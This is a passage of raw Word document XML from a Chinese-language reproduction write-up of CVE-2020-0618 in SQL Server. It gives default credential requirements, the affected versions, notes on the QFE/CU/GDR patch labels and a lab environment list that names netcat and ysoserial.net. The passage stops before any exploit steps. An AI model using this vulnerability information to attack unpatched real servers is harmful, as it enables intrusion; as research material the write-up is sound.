                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>基本</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2009" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00A37C2C" w:rsidRDefault="00A37C2C" w:rsidP="009B14DC">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="171717"/>
                <w:szCs w:val="21"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A37C2C" w:rsidTr="00A37C2C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2229" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00A37C2C" w:rsidRDefault="00A37C2C" w:rsidP="009B14DC">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="171717"/>
                <w:szCs w:val="21"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>自定义</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2049" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00A37C2C" w:rsidRDefault="00A37C2C" w:rsidP="009B14DC">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="171717"/>
                <w:szCs w:val="21"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>(Anonymous)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2009" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00A37C2C" w:rsidRDefault="00A37C2C" w:rsidP="009B14DC">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="171717"/>
                <w:szCs w:val="21"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00A37C2C" w:rsidRDefault="005101FC" w:rsidP="009B14DC">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>也就是说默认情况下，只认域或工作组的有效用户凭证</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F35FC7" w:rsidRDefault="00F35FC7" w:rsidP="009B14DC"/>
    <w:p w:rsidR="00F35FC7" w:rsidRDefault="00F35FC7" w:rsidP="00F35FC7">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>x</w:t>
      </w:r>
      <w:r w:rsidR="00AB2E6B">
        <w:t>02</w:t>
      </w:r>
      <w:r w:rsidR="009252BC">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>影响版本</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="a5"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8296"/>
      </w:tblGrid>
      <w:tr w:rsidR="000C3B22" w:rsidTr="000C3B22">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8296" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="000C3B22" w:rsidRDefault="000C3B22" w:rsidP="00F35FC7">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="333333"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:shd w:val="clear" w:color="auto" w:fill="F9F9F9"/>
              </w:rPr>
              <w:t>Microsoft SQL Server 2012 for 32-bit Systems Service Pack 4</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000C3B22" w:rsidTr="000C3B22">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8296" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="000C3B22" w:rsidRDefault="000C3B22" w:rsidP="00F35FC7">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="333333"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>Microsoft SQL Server 2012 for x64-based Systems Service Pack 4</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000C3B22" w:rsidTr="000C3B22">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8296" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="000C3B22" w:rsidRDefault="000C3B22" w:rsidP="00F35FC7">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="333333"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="333333"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:shd w:val="clear" w:color="auto" w:fill="F9F9F9"/>
              </w:rPr>
              <w:t>Microsoft SQL Server 2014 Service Pack 3 for 32-bit Systems</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000C3B22" w:rsidTr="000C3B22">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8296" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="000C3B22" w:rsidRDefault="000C3B22" w:rsidP="00F35FC7">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="333333"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:shd w:val="clear" w:color="auto" w:fill="F9F9F9"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="333333"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>Microsoft SQL Server 2014 Service Pack 3 for 32-bit Systems</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000C3B22" w:rsidTr="000C3B22">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8296" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="000C3B22" w:rsidRDefault="000C3B22" w:rsidP="00F35FC7">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="333333"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="333333"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:shd w:val="clear" w:color="auto" w:fill="F9F9F9"/>
              </w:rPr>
              <w:t>Microsoft SQL Server 2014 Service Pack 3 for x64-based Systems</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000C3B22" w:rsidTr="000C3B22">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8296" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="000C3B22" w:rsidRDefault="000C3B22" w:rsidP="00F35FC7">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="333333"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:shd w:val="clear" w:color="auto" w:fill="F9F9F9"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="333333"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>Microsoft SQL Server 2014 Service Pack 3 for x64-based Systems</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000C3B22" w:rsidTr="000C3B22">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8296" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="000C3B22" w:rsidRDefault="000C3B22" w:rsidP="00F35FC7">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="333333"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="333333"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:shd w:val="clear" w:color="auto" w:fill="F9F9F9"/>
              </w:rPr>
              <w:t>Microsoft SQL Server 2016 for x64-based Systems Service Pack 2</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000C3B22" w:rsidTr="000C3B22">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8296" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="000C3B22" w:rsidRDefault="000C3B22" w:rsidP="00F35FC7">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="333333"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:shd w:val="clear" w:color="auto" w:fill="F9F9F9"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="333333"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>Microsoft SQL Server 2016 for x64-based Systems Service Pack 2</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00226E1E" w:rsidRDefault="00226E1E" w:rsidP="00F35FC7"/>
    <w:p w:rsidR="00492C9D" w:rsidRDefault="0004080A" w:rsidP="00F35FC7">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>【</w:t>
      </w:r>
      <w:r w:rsidR="00226E1E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注</w:t>
      </w:r>
      <w:r w:rsidR="00226E1E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>】</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F35FC7" w:rsidRDefault="00226E1E" w:rsidP="00F35FC7">
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>有些漏洞复现文章写受影响版本形式如下</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00226E1E" w:rsidRDefault="00226E1E" w:rsidP="00F35FC7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Microsoft YaHei UI" w:eastAsia="Microsoft YaHei UI" w:hAnsi="Microsoft YaHei UI"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="8"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Microsoft YaHei UI" w:eastAsia="Microsoft YaHei UI" w:hAnsi="Microsoft YaHei UI" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="8"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>SQL Server 2012 for 32-bit Systems Service Pack 4 (QFE)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00226E1E" w:rsidRDefault="00226E1E" w:rsidP="00F35FC7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Microsoft YaHei UI" w:eastAsia="Microsoft YaHei UI" w:hAnsi="Microsoft YaHei UI"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="8"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Microsoft YaHei UI" w:eastAsia="Microsoft YaHei UI" w:hAnsi="Microsoft YaHei UI" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="8"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>SQL Server 2014 Service Pack 3 for 32-bit Systems (CU)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Microsoft YaHei UI" w:eastAsia="Microsoft YaHei UI" w:hAnsi="Microsoft YaHei UI" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="8"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Microsoft YaHei UI" w:eastAsia="Microsoft YaHei UI" w:hAnsi="Microsoft YaHei UI" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="8"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>SQL Server 2014 Service Pack 3 for 32-bit Systems (GDR)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00360BDD" w:rsidRDefault="00226E1E" w:rsidP="00F35FC7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Microsoft YaHei UI" w:eastAsia="Microsoft YaHei UI" w:hAnsi="Microsoft YaHei UI"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="8"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Microsoft YaHei UI" w:eastAsia="Microsoft YaHei UI" w:hAnsi="Microsoft YaHei UI" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="8"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>当时有点懵，后经查阅资料发现，这种形式源于官方的写法（</w:t>
      </w:r>
      <w:hyperlink r:id="rId7" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a4"/>
          </w:rPr>
          <w:t>https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0618</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00360BDD">
        <w:rPr>
          <w:rFonts w:ascii="Microsoft YaHei UI" w:eastAsia="Microsoft YaHei UI" w:hAnsi="Microsoft YaHei UI" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="8"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00226E1E" w:rsidRPr="008D42BD" w:rsidRDefault="00226E1E" w:rsidP="00F35FC7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="8"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008D42BD">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="8"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>官方的本意是指补丁的版本，其中Q</w:t>
      </w:r>
      <w:r w:rsidRPr="008D42BD">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="8"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>FE</w:t>
      </w:r>
      <w:r w:rsidRPr="008D42BD">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="8"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>指的是更有针对性的快速修复版，</w:t>
      </w:r>
      <w:r w:rsidRPr="008D42BD">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="8"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>CU</w:t>
      </w:r>
      <w:r w:rsidRPr="008D42BD">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="8"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>指的是累积更新版，</w:t>
      </w:r>
      <w:r w:rsidRPr="008D42BD">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="8"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>GDR</w:t>
      </w:r>
      <w:r w:rsidRPr="008D42BD">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="8"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>指的是适用性更广的通用发行版，</w:t>
      </w:r>
      <w:r w:rsidR="008D42BD">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="8"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>个人觉得这里如果想表示</w:t>
      </w:r>
      <w:r w:rsidRPr="008D42BD">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="8"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>受影响版本，应该把这些去掉</w:t>
      </w:r>
      <w:r w:rsidR="008D42BD">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="8"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>更准确些</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00226E1E" w:rsidRDefault="00226E1E" w:rsidP="00F35FC7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Microsoft YaHei UI" w:eastAsia="Microsoft YaHei UI" w:hAnsi="Microsoft YaHei UI"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="8"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00492C9D" w:rsidRDefault="0004080A" w:rsidP="00F35FC7">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>【</w:t>
      </w:r>
      <w:r w:rsidR="00226E1E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注</w:t>
      </w:r>
      <w:r w:rsidR="00226E1E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>】</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00226E1E" w:rsidRDefault="00226E1E" w:rsidP="00F35FC7">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>360</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的灵腾安全实验室在复现分析此漏洞是提到，此漏洞也影响</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="585858"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>SQL Server 2008</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="585858"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI" w:hint="eastAsia"/>
          <w:color w:val="585858"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>并且没有对应补丁</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00226E1E" w:rsidRDefault="00226E1E" w:rsidP="00F35FC7"/>
    <w:p w:rsidR="00A8135D" w:rsidRDefault="00A8135D" w:rsidP="00A8135D">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>x</w:t>
      </w:r>
      <w:r w:rsidR="00AB2E6B">
        <w:t>03</w:t>
      </w:r>
      <w:r w:rsidR="009252BC">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>复现环境</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A8135D" w:rsidRDefault="006609F4" w:rsidP="00A8135D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidR="00A8135D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidR="00A8135D">
        <w:t xml:space="preserve"> S</w:t>
      </w:r>
      <w:r w:rsidR="00A8135D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>erver</w:t>
      </w:r>
      <w:r w:rsidR="00A8135D">
        <w:t xml:space="preserve"> 2016 D</w:t>
      </w:r>
      <w:r w:rsidR="00A8135D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ata</w:t>
      </w:r>
      <w:r w:rsidR="00A8135D">
        <w:t>center</w:t>
      </w:r>
      <w:r w:rsidR="00092E7D">
        <w:t>（</w:t>
      </w:r>
      <w:hyperlink r:id="rId8" w:history="1">
        <w:r w:rsidR="00092E7D">
          <w:rPr>
            <w:rStyle w:val="a4"/>
          </w:rPr>
          <w:t>https://msdn.itellyou.cn/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00092E7D">
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A8135D" w:rsidRDefault="006609F4" w:rsidP="00A8135D">
      <w:r>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidR="00A8135D">
        <w:t>SQL Server 2016 Developer Edition x64</w:t>
      </w:r>
      <w:r w:rsidR="00092E7D">
        <w:t>（</w:t>
      </w:r>
      <w:hyperlink r:id="rId9" w:history="1">
        <w:r w:rsidR="00092E7D">
          <w:rPr>
            <w:rStyle w:val="a4"/>
          </w:rPr>
          <w:t>https://msdn.itellyou.cn/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00092E7D">
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A8135D" w:rsidRDefault="006609F4" w:rsidP="00A8135D">
      <w:r>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidR="00A8135D">
        <w:t>Postman-win64-7.22.1</w:t>
      </w:r>
      <w:r w:rsidR="00092E7D">
        <w:t>（</w:t>
      </w:r>
      <w:hyperlink r:id="rId10" w:history="1">
        <w:r w:rsidR="00092E7D">
          <w:rPr>
            <w:rStyle w:val="a4"/>
          </w:rPr>
          <w:t>https://www.postman.com/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00092E7D">
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A8135D" w:rsidRDefault="006609F4" w:rsidP="00A8135D">
      <w:r>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidR="00A8135D" w:rsidRPr="00A8135D">
        <w:t>netcat-1.11</w:t>
      </w:r>
      <w:r w:rsidR="00092E7D">
        <w:t>（</w:t>
      </w:r>
      <w:hyperlink r:id="rId11" w:history="1">
        <w:r w:rsidR="00092E7D">
          <w:rPr>
            <w:rStyle w:val="a4"/>
          </w:rPr>
          <w:t>https://eternallybored.org/misc/netcat/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00092E7D">
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A8135D" w:rsidRDefault="006609F4" w:rsidP="00A8135D">
      <w:r>
        <w:t>5</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidR="00A8135D" w:rsidRPr="00A8135D">
        <w:t>ysoserial-1.32</w:t>
      </w:r>
      <w:r w:rsidR="00092E7D">
        <w:t>（</w:t>
      </w:r>
      <w:hyperlink r:id="rId12" w:history="1">
        <w:r w:rsidR="00092E7D">
          <w:rPr>
            <w:rStyle w:val="a4"/>
          </w:rPr>
          <w:t>https://github.com/pwntester/ysoserial.net</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00092E7D">
